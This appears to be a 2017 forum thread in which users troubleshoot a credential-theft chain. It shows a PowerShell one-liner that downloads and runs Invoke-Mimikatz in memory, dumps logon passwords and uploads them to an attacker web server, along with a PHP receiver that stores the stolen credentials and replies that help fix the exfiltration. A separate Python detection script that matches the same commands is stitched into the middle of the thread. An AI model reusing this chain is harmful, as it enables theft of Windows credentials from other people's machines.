Exmix, posted September 3, 2017

So thanks to ThoughtfulDev I was able to get this working very nicely. So after testing it on mine and my cousin's Windows 7 PC (with his permission of course), those worked great, but when testing with our Windows 10 PCs, I got an error.

      .#####.   mimikatz 2.1 (x64) built on Nov 10 2016 15:31:14
     .## ^ ##.  "A La Vie, A L'Amour"
     ## / \ ##  /* * *
     ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
     '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
      '#####'                                     with 20 modules * * */

    ERROR mimikatz_initOrClean ; CoInitializeEx: 80010106

    mimikatz(powershell) # sekurlsa::logonpasswords
    ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)

    mimikatz(powershell) # exit
    Bye!

I tried this on a few other Windows 10 PCs to make sure it wasn't just those PCs in specific. I was wondering if anyone else has gotten this or might know a way around this or a possible fix.
Exmix, posted September 8, 2017

On 9/6/2017 at 11:00 PM, kdodge said:

> Are you sure you're running it as Administrator?

100% positive. I'm doing it from my Windows 10 laptop, running this script from an administrator command prompt.

    powershell "IEX (New-Object Net.WebClient).DownloadString('MyWebServer/My.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('MyWebServer/My.php', $output)"

With that I still get the output I put in my first post.
Exmix, posted September 9, 2017 (edited September 9, 2017 by Exmix)

1 hour ago, kdodge said:

> It could be a bug, you might try contacting the author. One other thing I can think of, are you running an AV? The description says "...Without rights to access lsass process..." so an antivirus program might just be blocking access to that process, even if you have admin rights. It kinda sounds like something is anyway.

I am but that is disabled. I know the AV detects it. Contacting the owner - I posted it here since it was @Darren Kitchen who made the YouTube video on it.
TeCHemically, posted November 18, 2017 (edited November 18, 2017 by TeCHemically)

On 9/8/2017 at 11:49 PM, Exmix said:

> I am but that is disabled. I know the AV detects it. Contacting the owner - I posted it here since it was @Darren Kitchen who made the YouTube video on it.

Windows 10 has patched lsass now which effectively breaks mimikatz functionality.
TeCHemically, posted November 18, 2017

I have a question about this; I have always used tcpdump for this attack because the PHP file never gathers the incoming credentials. Can someone tell me what I am doing wrong? I am using the same command as above:

    powershell "IEX (New-Object Net.WebClient).DownloadString('MyWebServer/My.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('MyWebServer/My.php', $output)"

Here is the PHP script:

    <?php $file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds"; file_put_contents($file, file_get_contents("php://input")); ?>

It was broken up like this before, but didn't seem to have any effect (I know almost nothing of PHP, so this probably makes no difference):

    <?php
    $file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds";
    file_put_contents($file, file_get_contents("php://input"));
    ?>

Thanks to any who reply!
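Seen from the defender's side, the one-liner quoted in this thread leaves a distinctive process command line. The following is an added example, not code from any poster in this thread, that scores command lines (as recorded by process-creation logging such as Windows event 4688 with command-line auditing, or Sysmon event 1) for the same elements; the rule names, host names and sample events are constructed for illustration.

```python
import re

# Elements of the one-liner quoted in this thread; rule names are this example's own.
RULES = {
    "download_cradle": re.compile(r"net\.webclient\)?\s*\.\s*downloadstring", re.I),
    "in_memory_exec": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "mimikatz_cmdlet": re.compile(r"invoke-mimikatz|sekurlsa::", re.I),
    "http_upload": re.compile(r"\.\s*upload(string|data|file)\b", re.I),
}

def normalize(cmdline):
    """Undo simple keyword splitting: backtick/caret escapes and 'a'+'b' joins."""
    cmdline = re.sub(r"[`^]", "", cmdline)
    return re.sub(r"""['"]\s*\+\s*['"]""", "", cmdline)

def classify(cmdline):
    """Return (severity, sorted rule names) for one process command line."""
    text = normalize(cmdline)
    hits = sorted(name for name, rx in RULES.items() if rx.search(text))
    if "mimikatz_cmdlet" in hits:
        severity = "high"
    elif {"download_cradle", "in_memory_exec"} <= set(hits):
        severity = "medium"
    else:
        severity = "low" if hits else "none"
    return severity, hits

def triage(events):
    """Keep only events that matched at least one rule."""
    out = []
    for host, cmdline in events:
        severity, hits = classify(cmdline)
        if hits:
            out.append((host, severity, hits))
    return out

# Constructed sample events: (host, command line as a process-creation log would record it).
SAMPLE_EVENTS = [
    ("WS01", "powershell \"IEX (New-Object Net.WebClient).DownloadString('MyWebServer/My.ps1'); "
             "$output = Invoke-Mimikatz -DumpCreds; "
             "(New-Object Net.WebClient).UploadString('MyWebServer/My.php', $output)\""),
    ("WS02", "powershell -nop \"I`EX (New-Object Net.WebClient).Download`String('MyWebServer/a.ps1')\""),
    ("WS03", "powershell -Command \"Get-ChildItem C:\\Users\""),
]

if __name__ == "__main__":
    for host, severity, hits in triage(SAMPLE_EVENTS):
        print(host, severity, ",".join(hits))
```

Command-line matching only sees what reaches the process arguments, so it is best paired with PowerShell script block logging, which records the downloaded script content itself.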
TeCHemically, posted November 21, 2017 (edited November 21, 2017 by TeCHemically)

On 11/19/2017 at 1:25 PM, kdodge said:

> It could be a lot of things, but you should start with checking if the file has write permissions to the server you're running this on
>
>     <?php
>     $file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds";
>     if(is_writable($file))
>         file_put_contents($file, file_get_contents("php://input"));
>     else
>         echo $file.' is not writable.';
>     ?>
>
> Run tcpdump with this to see if it's not writable.

Great advice, thanks for your response! I took your advice and here is what I got:

    2017-11-20_19-46-03.creds is not writable.#file_put_contents($file, file_get_contents("php://input"));

So, it looks like the file does not have write permissions. I thought I had the permissions set appropriately, but clearly I wasn't right. The file has write permissions for www-data (file is owned by www-data). What setting do I need to set so that this file has permissions to write to the server? Sorry for the nooby question. Thanks again for your help in identifying the issue!